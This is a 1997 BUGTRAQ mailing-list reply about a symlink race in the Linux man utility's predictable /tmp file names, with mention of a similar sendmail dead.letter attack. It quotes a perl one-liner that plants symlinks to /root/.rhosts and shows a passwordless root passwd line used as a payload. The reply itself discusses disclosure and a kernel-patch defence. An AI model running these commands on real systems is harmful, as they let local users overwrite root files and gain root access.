Date:        12/26/97 2:35:15 AM
From:        <fluffy@BENATAR.DUNADAN.COM>
Subject:     Re: man problem
To:          ("<BUGTRAQ@NETSPACE.ORG>"@LOCAL)

On Wed, 24 Dec 1997, Thomas Fischbacher wrote:

> I just noticed a problem with the man system (version 2.3.10) on my Linux

I have man version 1.4j (from typing man -?) and it doesn't exhibit this
problem.  It writes directly to var/catman and doesn't use /tmp for
anything.

> box: /usr/man contains the .gz'd man pages:
<snip>
> When I execute man, a temporary file containing the un-zipped manpage is
> created in /tmp. The name of the tmp-file usually is "zman<PID>aaa",
> e.g. "zman10849aaa". This can be exploited with a simple symlink attack:
>
> perl -e 'for($i=8000;$i<12000;$i++){`ln -s /root/.rhosts /tmp/zman${i}aaa`;}'
>
> So when root executes man here and the pid of the man process falls in the
> range 8000-11999... you know the rest.

In general passive attacks like this can be used to overwrite arbitrary
files on the system by making symlinks if and only if root isn't paying
attention to what he is doing.  I personally prefer the kernel patch which
prevents users from making symlinks to files which they don't own.  It
solves this and a host of other symlink problems.  I never yet found a
reason not to do this.

A much more serious problem is the symlink attack with sendmail, wherein
bad guys can symlink /var/tmp/dead.letter to wherever they want and then
cause sendmail to write a dead letter into it, typically containing
something like 'r00t::0:0:r00t:/root:/bin/bash' :)